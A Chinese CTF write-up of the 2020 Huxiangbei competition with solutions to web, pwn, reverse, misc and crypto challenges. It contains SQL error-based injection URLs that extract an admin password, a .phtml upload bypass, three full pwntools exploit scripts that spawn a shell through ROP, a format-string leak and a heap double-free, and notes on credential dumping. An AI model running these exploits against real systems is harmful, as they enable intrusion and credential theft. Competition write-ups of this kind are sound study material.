湖湘杯 2020 WriteUp

Posted by Qfrost on 2020-11-03
Estimated Reading Time 18 Minutes
Words 3.5k In Total
Viewed Times

这次比赛,感觉题目质量很一般,反正湖湘杯,大家懂的都懂

WEB

WEB1 题目名字不重要反正题挺简单的

?file=phpinfo

DASCTF{d98cdaf0e8436c07b0e291b2adb30469}

WEB4 NewWebsite

随便试试发现一个报错注入

1
http://47.111.104.169:57700/?r=content&cid=0%20||updatexml(1,concat(0x3a,(select%20(group_concat((table_name)))from(information_schema.tables)where(table_schema=database())),0x3a),1)#

image-20201101185331111

由于转义了单引号,使用反引号绕过,在manager表中找到admin密码

1
http://47.111.104.169:57700/?r=content&cid=0%20||updatexml(1,concat(0x3a,(select%20(group_concat((`password`)))from(manage)),0x3a),1)#

image-20201101195950894

解密密码为admin,进入后台发现manager页面中有一个文件上传点,结果测试,并没有严格的按照白名单来过滤,后缀phtml绕过。

image-20201101200259197

image-20201101200529917

DASCTF{7cc11ecde5816f4a60ec268a5150828e}

Pwn

Pwn1 pwn_printf

思路:经过pwndbg动态调试发现输入的16个数中只要第8个数等于0x20,也就是32就能够进入到sub_4007C6函数中,sub_4007C6函数中的read函数能够栈溢出然后用puts泄露libc_base,然后返回继续返回到sub_4007C6函数中,利用argument传递参数实现再次利用read函数,然后覆盖返回地址为system(‘/bin/sh’)来getshell。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
#!/usr/bin/python
#coding=utf-8
#__author__:C7
from pwn import*

local_file = './pwn_printf'
local_libc = '/lib/x86_64-linux-gnu/libc.so.6'
remote_libc = local_libc

is_local = False
is_remote = False
#47.111.104.99, 51006
if len(sys.argv) == 1:
is_local = True
p = process(local_file)
libc = ELF(local_libc)
elif len(sys.argv) > 1:
is_remote = True
if len(sys.argv) == 3:
host = sys.argv[1]
port = sys.argv[2]
else:
host, port = sys.argv[1].split(':')
p = remote(host,port)
libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(delim, data)
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(delim, data)
sea = lambda delim,data :p.sendafter(delim, data)
rc = lambda numb=4096 :p.recv(numb)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr :p.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
if is_local: gdb.attach(p,cmd)

#ropgadget
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
pop_rdi_ret=0x401213
sub_4007C6 =0x401172
ret=0x400731
pop_rbp_ret=0x400730
argument=0x603018+0x10068
sl(str(0x20))
sl(str(0x20))
sl(str(0x20))
sl(str(0x20))
sl(str(0x20))
sl(str(0x20))
sl(str(0x20))
sl(str(0x20))
sl(str(0x20))
sl(str(0x20))
sl(str(0x20))
sl(str(0x20))
sl(str(0x20))
sl(str(0x20))
sl(str(0x20))
sl(str(0x20))
#rbp #ret
payload='aaaaaaaa'+p64(pop_rdi_ret)+p64(puts_got)+p64(puts_plt)+p64(pop_rbp_ret)+p64(argument)+p64(sub_4007C6)
se(payload)
#libc_base
libc_base=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-0x6f6a0
sys_addr=libc_base+0x453a0
binsh=libc_base+0x18ce17
#getshell
payload='aaaaaaaa'+p64(pop_rdi_ret)+p64(binsh)+p64(sys_addr)
se(payload)
p.interactive()

pwn1.png

DASCTF{0437f3add9a4e657cbacd7c2545e1852}

pwn2 blend_pwn

思路:利用格式化字符串泄露libc基地址,del函数中没有对chunk中的内容进行清零,然后利用show功能泄露出堆地址,然后在堆上布置好system(‘/bin/sh’)后,再利用 partial write 实现栈迁移到我们已经布置好system(‘/bin/sh’)的堆上后实现getshell。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
#!/usr/bin/python
#coding=utf-8
#__author__:C7
from pwn import*

local_file = './blend_pwn'
local_libc = '/lib/x86_64-linux-gnu/libc.so.6'
remote_libc = local_libc

is_local = False
is_remote = False
if len(sys.argv) == 1:
is_local = True
p = process(local_file)
libc = ELF(local_libc)
elif len(sys.argv) > 1:
is_remote = True
if len(sys.argv) == 3:
host = sys.argv[1]
port = sys.argv[2]
else:
host, port = sys.argv[1].split(':')
p = remote(host,port)
libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(delim, data)
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(delim, data)
sea = lambda delim,data :p.sendafter(delim, data)
rc = lambda numb=4096 :p.recv(numb)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr :p.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
if is_local: gdb.attach(p,cmd)

def printname():
sla('>','1')
def add(content):
sla('>','2')
sla('note:',content)
def free(idx):
sla('>','3')
sla('>',str(idx))
def show():
sla('>','4')

sl("%p%p")
printname()
ru("0x")
ru("0x")
#libc_base
libc_base=int(p.recv(12),16)-0x3c6780
ret = libc_base + 0x0937
pop_rdi = libc_base + 0x21112
sys_addr = libc_base + libc.sym['system'] # 0x45390
binsh = libc_base + libc.search("/bin/sh").next() # 0x18cd57
add(p64(ret)*6+p64(pop_rdi)+p64(binsh)+p64(sys_addr))
add('a'*0x60)#0 1
free(0)#1
free(1)#0
show()
ru("2:")
heap_addr=u64(p.recvuntil("\n")[:-1].ljust(8,"\x00"))
sl("666")
rc()
sl('a'*0x20+p64(heap_base+0x28)+'bbbbbbbbbbbbbbbbbb') #partial write
p.interactive()

pwn2.png

DASCTF{629913f90cad801155fc60ac6d4861b3}

pwn4 babyheap

思路:我们可以在show函数还有del函数中看到程序没有检查我们的idx索引,并且我们的del中存在offbynull漏洞。

我们先申请12个chunk将tcache填满后再释放,然后我们将一个chunk申请到unsorted bins中来利用show功能泄露heap的基地址后,因为puts函数中会遇0截断,而且bk存在main_arena+96,我们可以填充fd为垃圾数据然后泄露libc基地址,然后利用show的负数索引 即 show(-7) 泄露pie的地址 。由于偏移是固定值的,我们可以计算偏移 offset = int((heap-bss_addr)/8 实现double free 最后改fd指向 free_hook 为system,delete(“/bin/sh”) 获得shell。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
#!/usr/bin/python
#coding=utf-8
#__author__:C7
from pwn import*

local_file = './babyheap'
local_libc = './libc.so.6'
remote_libc = local_libc

is_local = False
is_remote = False
if len(sys.argv) == 1:
is_local = True
p = process(local_file)
libc = ELF(local_libc)
elif len(sys.argv) > 1:
is_remote = True
if len(sys.argv) == 3:
host = sys.argv[1]
port = sys.argv[2]
else:
host, port = sys.argv[1].split(':')
p = remote(host,port)
libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se = lambda data :p.send(data)
sa = lambda delim,data :p.sendafter(delim, data)
sl = lambda data :p.sendline(data)
sla = lambda delim,data :p.sendlineafter(delim, data)
sea = lambda delim,data :p.sendafter(delim, data)
rc = lambda numb=4096 :p.recv(numb)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr :p.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
if is_local: gdb.attach(p,cmd)


def add():
sla(">>","1")

def edit(idx,size,con):
sla(">>","3")
sla("?",str(idx))
sla(":",str(size))
sa(":",con)

def show(idx):
sla(">>","2")
sla("?",str(idx))

def delete(idx):
sla(">>","4")
sla("?",str(idx))

for i in range(12):
add()
for i in range(7):
delete(i+3)

delete(10)
add()
show(3)
p.recv()
heap_base = u64(p.recv(6).ljust(8,'\x00'))-0xa60

for i in range(6):
add()

add() #10
edit(10,20,"a"*8)

show(10)
libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-96-0x10-libc.sym["__malloc_hook"]

show(-7)
p.recv()
bss_addr = u64(p.recv(6).ljust(8,'\x00'))+0x7*8

edit(0,0xf0,p64(heap_base+0x260)*0x10)
offset = int((heap_base+0x260-bss_addr)/8)
delete(offset)
delete(0)
free_hook = libc_base+libc.sym["__free_hook"]
sys_addr = libc_base+libc.sym["system"]
add()
edit(0,0x10,p64(free_hook))
add()
add()
edit(13,0x10,p64(sys_addr))

edit(1,0x10,"/bin/sh\x00")
delete(1)

p.interactive()

pwn4.png

DASCTF{98a7fd67308de4ede4ffa02613b0e801}

Re

Re1 easyZ

这题是真的绝活 IBM汇编 人肉IDA 题还第一个上,出题人可真有你的噢

找了一大圈实在是找不到能用的反编译工具,只能是对着txt文件人肉IDA


首先找到rodata段,通过 107106 搜索来到main函数


第一个函数似乎只是单纯的做了一个格式检测,是不是都是十六进制

第二个函数就是扣一元二次方程了,直接Z3一把梭

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from z3 import *

box1 = [0x0000b2b0,0x00006e72,0x00006061,0x0000565d,0x0000942d,0x0000ac79,0x0000391c,0x0000643d,0x0000ec3f,0x0000bd10,0x0000c43e,0x00007a65,0x0000184b,0x0000ef5b,0x00005a06,0x0000a8c0,0x0000f64b,0x0000c774,0x000002ff,0x00008e57,0x0000aed9,0x0000d8a9,0x0000230c,0x000074e8,0x0000c2a6,0x000088b3,0x0000af2a,0x00009ea7,0x0000ce8a,0x00005924,0x0000d276,0x000056d4]
box2 = [0x000077d7,0x0000990e,0x0000b585,0x00004bcd,0x00005277,0x00001afc,0x00008c8a,0x0000cdb5,0x00006e26,0x00004c22,0x0000673f,0x0000daff,0x00000fac,0x000086c7,0x0000e048,0x0000c483,0x000085d3,0x00002204,0x0000c2ee,0x0000e07f,0x00000caf,0x0000bf76,0x000063fe,0x0000bffb,0x00004b09,0x0000e5b3,0x00008bda,0x000096df,0x0000866d,0x00001719,0x00006bcf,0x0000adcc]
box3 = [0x00000f2b,0x000051ce,0x00001549,0x000020c1,0x00003a8d,0x000005f5,0x00005403,0x00001125,0x00009161,0x0000e2a5,0x00005196,0x0000d8d2,0x0000d644,0x0000ee86,0x00003896,0x00002e71,0x0000a6f1,0x0000dfcf,0x00003ece,0x00007d49,0x0000c24d,0x0000237e,0x00009352,0x00007a97,0x00007bfa,0x0000cbaa,0x000010dc,0x00003bd9,0x00007d7b,0x00003b88,0x0000b0d0,0x0000e8bc]
result = [0x08a73233,0x116db0f6,0x0e654937,0x03c374a7,0x16bc8ed9,0x0846b755,0x08949f47,0x04a13c27,0x0976cf0a,0x07461189,0x1e1a5c12,0x11e64d96,0x03cf09b3,0x093cb610,0x0d41ea64,0x07648050,0x092039bf,0x08e7f1f7,0x004d871f,0x1680f823,0x06f3c3eb,0x2205134d,0x015c6a7c,0x11c67ed0,0x0817b32e,0x06bd9b92,0x08806b0c,0x06aaa515,0x205b9f76,0x0de963e9,0x2194e8e2,0x047593bc]
flag = []


solver = Solver()
for i in range(32):
flag.append(Int('flag%d' % i))
solver.add(box1[i]*flag[i]**2 + box2[i]*flag[i] + box3[i] == result[i])

print(solver.check())
if solver.check() == sat:
model = solver.model()
for i in flag:
print(chr(model[i].as_long()), end = '')

# 8eb5d8b632dae2a5167e3e1c4884eef9

Re2 easyre

一开IDA吓一跳 一大堆一大堆的运算,有的地方还不能F5。然后跟了下,发现都是运行不到的代码。main函数做了个栈溢出,SROP的方法ret的时候修改了EIP来到算法

这里就是保存输入的第一字节的高三位,然后会进入一个循环

这里就是把每一字节的低五位移动到高五位,然后把下一字节的高三位移动到这一字节的低三位,再做一下与下标值的异或。然后最后把之前保存的最高三位移到最后,且最后一字节不异或

然后…就没了,直接就check了,笑死

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
cipher = [0x2B, 0x08, 0xA9, 0xC8, 0x97, 0x2F, 0xFF, 0x8C, 0x92, 0xF0, 0xA3, 0x89, 0xF7, 0x26, 0x07, 0xA4, 0xDA, 0xEA, 0xB3, 0x91, 0xEF, 0xDC, 0x95, 0xAB]

binary = ""
for i in range(23): # 最后一字节不异或
cipher[i] ^= i

for i in range(24):
tmp = bin(cipher[i])
val = tmp.replace("0b", '')
binary += val.zfill(8)

print(binary)

flag = "011001010110000100110101011110010111001001100101010111110011000101110011010111110011010100110000010111110110010101100001001101010111100101011111011101000011000001011111011110010011000001110101"

for i in range(24):
val = "0b" + flag[(i*8):(i*8+8)]
val = eval(val)
print( chr( val ), end="" )

# ea5yre_1s_50_ea5y_t0_y0u

Re3 ReMe

Python打包exe逆向 pyinstxtractor.py解包

常规套路把struct头16字节复制到ReMe文件头上,反编译pyc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
# uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.8.0 (tags/v3.8.0:fa919fd, Oct 14 2019, 19:37:50) [MSC v.1916 64 bit (AMD64)]
# Embedded file name: ReMe.py
# Compiled at: 1995-09-28 00:18:56
# Size of source mod 2**32: 272 bytes
import sys, hashlib
check = [
'e5438e78ec1de10a2693f9cffb930d23',
'08e8e8855af8ea652df54845d21b9d67',
'a905095f0d801abd5865d649a646b397',
'bac8510b0902185146c838cdf8ead8e0',
'f26f009a6dc171e0ca7a4a770fecd326',
'cffd0b9d37e7187483dc8dd19f4a8fa8',
'4cb467175ab6763a9867b9ed694a2780',
'8e50684ac9ef90dfdc6b2e75f2e23741',
'cffd0b9d37e7187483dc8dd19f4a8fa8',
'fd311e9877c3db59027597352999e91f',
'49733de19d912d4ad559736b1ae418a7',
'7fb523b42413495cc4e610456d1f1c84',
'8e50684ac9ef90dfdc6b2e75f2e23741',
'acb465dc618e6754de2193bf0410aafe',
'bc52c927138231e29e0b05419e741902',
'515b7eceeb8f22b53575afec4123e878',
'451660d67c64da6de6fadc66079e1d8a',
'8e50684ac9ef90dfdc6b2e75f2e23741',
'fe86104ce1853cb140b7ec0412d93837',
'acb465dc618e6754de2193bf0410aafe',
'c2bab7ea31577b955e2c2cac680fb2f4',
'8e50684ac9ef90dfdc6b2e75f2e23741',
'f077b3a47c09b44d7077877a5aff3699',
'620741f57e7fafe43216d6aa51666f1d',
'9e3b206e50925792c3234036de6a25ab',
'49733de19d912d4ad559736b1ae418a7',
'874992ac91866ce1430687aa9f7121fc']

def func(num):
result = []
while num != 1:
num = num * 3 + 1 if num % 2 else num // 2
result.append(num)

return result


if __name__ == '__main__':
print('Your input is not the FLAG!')
inp = input()
if len(inp) != 27:
print('length error!')
sys.exit(-1)
for i, ch in enumerate(inp):
ret_list = func(ord(ch))
s = ''
for idx in range(len(ret_list)):
s += str(ret_list[idx])
s += str(ret_list[(len(ret_list) - idx - 1)])

md5 = hashlib.md5()
md5.update(s.encode('utf-8'))
if md5.hexdigest() != check[i]:
sys.exit(i)

md5 = hashlib.md5()
md5.update(inp.encode('utf-8'))
print('You win!')
print('flag{' + md5.hexdigest() + '}')

好家伙 单字节验证 直接爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
import sys, hashlib
check = [
'e5438e78ec1de10a2693f9cffb930d23',
'08e8e8855af8ea652df54845d21b9d67',
'a905095f0d801abd5865d649a646b397',
'bac8510b0902185146c838cdf8ead8e0',
'f26f009a6dc171e0ca7a4a770fecd326',
'cffd0b9d37e7187483dc8dd19f4a8fa8',
'4cb467175ab6763a9867b9ed694a2780',
'8e50684ac9ef90dfdc6b2e75f2e23741',
'cffd0b9d37e7187483dc8dd19f4a8fa8',
'fd311e9877c3db59027597352999e91f',
'49733de19d912d4ad559736b1ae418a7',
'7fb523b42413495cc4e610456d1f1c84',
'8e50684ac9ef90dfdc6b2e75f2e23741',
'acb465dc618e6754de2193bf0410aafe',
'bc52c927138231e29e0b05419e741902',
'515b7eceeb8f22b53575afec4123e878',
'451660d67c64da6de6fadc66079e1d8a',
'8e50684ac9ef90dfdc6b2e75f2e23741',
'fe86104ce1853cb140b7ec0412d93837',
'acb465dc618e6754de2193bf0410aafe',
'c2bab7ea31577b955e2c2cac680fb2f4',
'8e50684ac9ef90dfdc6b2e75f2e23741',
'f077b3a47c09b44d7077877a5aff3699',
'620741f57e7fafe43216d6aa51666f1d',
'9e3b206e50925792c3234036de6a25ab',
'49733de19d912d4ad559736b1ae418a7',
'874992ac91866ce1430687aa9f7121fc']

def func(num):
result = []
while num != 1:
num = num * 3 + 1 if num % 2 else num // 2
result.append(num)

return result


if __name__ == '__main__':
print('Your input is not the FLAG!')
# inp = input()
# if len(inp) != 27:
# print('length error!')
# sys.exit(-1)
flag = ""
for i in range(27):
for k in range(33, 127):
ret_list = func(k)
s = ''
for idx in range(len(ret_list)):
s += str(ret_list[idx])
s += str(ret_list[(len(ret_list) - idx - 1)])

md5 = hashlib.md5()
md5.update(s.encode('utf-8'))
if md5.hexdigest() == check[i]:
flag += chr( k )
print(flag)
break

md5 = hashlib.md5()
md5.update(flag.encode('utf-8'))
print('You win!')
print('flag{' + md5.hexdigest() + '}')

# f
# fl
# fla
# flag
# flag{
# flag{M
# flag{My
# flag{My_
# flag{My_M
# flag{My_M@
# flag{My_M@t
# flag{My_M@th
# flag{My_M@th_
# flag{My_M@th_3
# flag{My_M@th_3X
# flag{My_M@th_3X+
# flag{My_M@th_3X+1
# flag{My_M@th_3X+1_
# flag{My_M@th_3X+1_R
# flag{My_M@th_3X+1_R3
# flag{My_M@th_3X+1_R3v
# flag{My_M@th_3X+1_R3v_
# flag{My_M@th_3X+1_R3v_T
# flag{My_M@th_3X+1_R3v_Te
# flag{My_M@th_3X+1_R3v_Te5
# flag{My_M@th_3X+1_R3v_Te5t
# flag{My_M@th_3X+1_R3v_Te5t}
# You win!
# flag{0584cfa2ce502951ef5606f6b99fc921}

Re4 easy_c++

我真是佛了,签到题放最后可真有你的噢

算法就是输入和下标做下异或

1
2
3
4
5
6
7
8
9
10
11
12
13
ciper = [
0x37, 0x64, 0x32, 0x31, 0x65, 0x3C, 0x65, 0x33, 0x3C, 0x3A,
0x33, 0x3B, 0x39, 0x3B, 0x6A, 0x69, 0x20, 0x74, 0x20, 0x72,
0x23, 0x77, 0x22, 0x24, 0x2A, 0x7B, 0x2A, 0x2B, 0x2A, 0x24,
0x7C, 0x2C, 0x00
]

flag = ""
for i in range(len(ciper)):
flag += chr( ciper[i] ^ i )
print(flag)

# 7e02a9c4439056df0e2a7b432b0069b3

Misc

Misc1 颜文字之谜

下载流量包,发现index-demo.html

image-20201101170837310

在源码中发现一段base64,使用base64隐写,网上随便找了个脚本就解出key:“lorrie”,使用stegsnow解出密文。

image-20201101183314976

1
flag{→_→←_←←_←←_←←_← →_→→_→←_←←_←←_← →_→←_←←_←←_← ←_←←_←←_←→_→→_→ ←_←←_←←_←→_→→_→ ←_← ←_←←_←←_←→_→→_→ →_→→_→→_→→_→←_← →_→←_←←_←←_← ←_←←_←←_←←_←←_← ←_←→_→→_→→_→→_→ →_→→_→→_→→_→→_→ ←_←←_←←_←←_←←_← ←_←←_←→_→←_← →_→←_←←_←←_← ←_←←_←←_←←_←→_→ ←_←→_→ ←_←←_←→_→→_→→_→ →_→→_→→_→→_→←_← ←_←←_←←_←←_←←_← ←_←←_←←_←→_→→_→ ←_←→_→ →_→→_→→_→→_→→_→ →_→←_←→_→←_← ←_← →_→→_→←_←←_←←_← →_→→_→→_→→_→←_← →_→←_←→_→←_← ←_←←_←←_←→_→→_→ ←_←←_←←_←→_→→_→ →_→→_→←_←←_←←_← →_→→_→→_→←_←←_←}

尝试了几波发现了是摩斯密码

1
2
3
4
5
6
7
<?php
$a="flag{→_→←_←←_←←_←←_← →_→→_→←_←←_←←_← →_→←_←←_←←_← ←_←←_←←_←→_→→_→ ←_←←_←←_←→_→→_→ ←_← ←_←←_←←_←→_→→_→ →_→→_→→_→→_→←_← →_→←_←←_←←_← ←_←←_←←_←←_←←_← ←_←→_→→_→→_→→_→ →_→→_→→_→→_→→_→ ←_←←_←←_←←_←←_← ←_←←_←→_→←_← →_→←_←←_←←_← ←_←←_←←_←←_←→_→ ←_←→_→ ←_←←_←→_→→_→→_→ →_→→_→→_→→_→←_← ←_←←_←←_←←_←←_← ←_←←_←←_←→_→→_→ ←_←→_→ →_→→_→→_→→_→→_→ →_→←_←→_→←_← ←_← →_→→_→←_←←_←←_← →_→→_→→_→→_→←_← →_→←_←→_→←_← ←_←←_←←_←→_→→_→ ←_←←_←←_←→_→→_→ →_→→_→←_←←_←←_← →_→→_→→_→←_←←_←}";
$b=str_replace("→_→", "-", $a);
$b=str_replace("←_←", ".", $b);
$b=str_replace(" ", "/", $b);
echo $b;
-..../--.../-.../...--/...--/./...--/----./-.../...../.----/-----/...../..-./-.../....-/.-/..---/----./...../...--/.-/-----/-.-././--.../----./-.-./...--/...--/--.../---..

67b33e39b5105fb4a2953a0ce79c3378

Misc2 passwd

取证送分题,mimikatz秒出

Misc3 虚实之间

打开zip,三个文件,先试了一下伪加密,发现副本那个txt是未加密的,然后副本和mingwen.txt的crc一样,拿出副本txt,然后自己做一份zip,里面要包含mingwen-副本.txt 和mingwen.txt

zip明文攻击获得密码

flag的txt里面第一眼看栅栏,手撸一下如下图

Misc4 隐藏的秘密

filescan发现桌面有个txt得到提示 md5(用户名:密码),尝试签到题的mimikatz,但是没有用。尝试注册表,hivelist找到SAM并hivedump下来

dump的时候发现一众用户里面有个时间不太一样的,printkey发现用户

hashdump里找到他的密码md5解密得到:NIAIWOMA

然后做MD5(用户名:密码) 即得到flag

Crypto

Crypto2 古典美++

题目如下

1
SZWLVSRVVZICMUOJYIIZBSVSSITFSWHPCWCFPVPFXJMWRVJICVRGTCFLHPRJKJKSRVWYFUSEWHFXLHFOSFLYPFXXYFPOEGXFXMBUHVNIYHNDWXPGBXWSYBNDVQRVYRTZUWKTFSKUMVERCCRSBEMKEDRUNYYVRYKXFOKVLVXYGTRQZOEHFEYKJRKRVXFPBOINXFTCSRQCKIGBXWLVOQVVOSFLCRRWXYFQWUHWFGRVVZICMYBUQSKJASUWLRURVVBAVSCTZOPVEUWKKGLQZCRUHJBLRSRSBTFSCYIJICFVDRUUFSIHWYFQONPEGTYBUSMTUSFVVLLOEIGRRGFEGJKIKPMYURAEBHOIIVFNMBVRJKICGYHPMFQOJVLVQYGJHHZUUOJOESFJZVGSIBLUVPEINYZRGISVRHFKIIHPSRWHZTYDGRMEUKSEWMKXYGVPTKZQVVGMUOMHCLOVUMRIRTKICXRUJFSDSRUSWLGZCLRXTMAVESUZQCDDRRHCRKRTLUGHZQXFPLSFIXYFAIGESRSBGRVWYFDSCOTRTRWKZICMRVFXKYUYZZFIKPFSIVICGYTKHVJVAVRIECMYGKKMJJQVROPKIGBBQSKIGBXRJKVKPCLRXEMKEVXRJPGYRASSYJVWLVZJZROPKIGBBPIRUFCDHAYZGKFXPUORGRBEEZRVZQKRCMIKLXVWCBZIMWFJZFIJKICHFSSWUFSYRYJFUVZFLNBQJVUCCJISCBXIVCRFZRUPUBURAEXMICGXYFDOCORVWCFTRQVUMOEHRUJUCEGIIIMKDDRPNGZVVMMFDOCOIECWHYLWKJKSJKIJBGRROSLEGALVXSFESKWMEHQCDHAYFPSEHEIUFSTHRKSCCWWLVFYFKKPVUKSJHIKIYHNRYCEZSWRYIUFCLVEEEKWCHWUPUBZWLZOITFUCFVQSVDPZDCVRGPVBPBKVIMFPOCWLZOEGFIXYJQGFUXZOFSIOIJTMBJLRKICGTKSFMPCFPEEERVFXKYUFWJZEJOMHRYIIZECFGSGQMFKXRZUWTFUWYPUWEJSWGFSINRFXJSUJIRTRVVUINBQBFRRVUMZZVXVORCYHVJUGZCLXNBQUFRHGSYQKLGVUMGRBMKPTSIBIJUFOKVESPSHKKIIJEVKGMJUYBTHFLURVVQMNPLRVUAYBRZRWMKVBSFUPFOEWKXHVJTSXRXKPYZZFIYBBBFLHVBUVRWPRUGHLGINBQCIOSEHGHLGIVJRVVUFLURVFXKYURVVBAVSCBZFIXSYBUZSIEQHFVEPQPSJHRKMWGYHFVHYBRJEZOGKFQHVSGTZVLRMJTROPIJEVKWLIPSUYWLVFYFKKLFXDIEQCZUJZJHIDUMQFPIFVRODRRXUFSGHSGMCHYDXNBJYNLXYUFSZULVBBGURAEXYFUWLVBLHZSEKIGSJLXYJLYJKINBQFRWLVSEZRGXYFPSNDWEPMBVOMJUCBZQKKIGGKLQVBQWKGMUORGFXRUBROCOXYFPWXKXNPPRSXXZTFOCOLRWCHFDWBUFSDZLRURVVQEDFMTKKITPSBKUCZTWCLNRFXNZVDWVNYODLWKIGGEHAQFYZRQHFSYIJWVRMGORQHJICHILIUUMQLUXJFWOJVLVTNCBHJROAMTXVKTCMZQKRTWCLUIWBJZZQKKIPCLJLKICOZUHFZMIKKMELWCLFSLMBARQEXFGHRQHNIYHRQMXOMFRQXCJRHCHKZSJGYHPCUFWENQVGMFRVOZOEBFLXCMLSMHVUPRCRVOGFPVRSWZTFOCOWVFGHNUMKUCBLSWFNCKYHVV

思路 :https://www.guballa.de/vigenere-solver 在这个在线解密网站得到密钥"orderby"后全部大写为"ORDERBY"然后md5加密得到flag为 c82bbc1ac4ab644c0aa81980ed2eb25b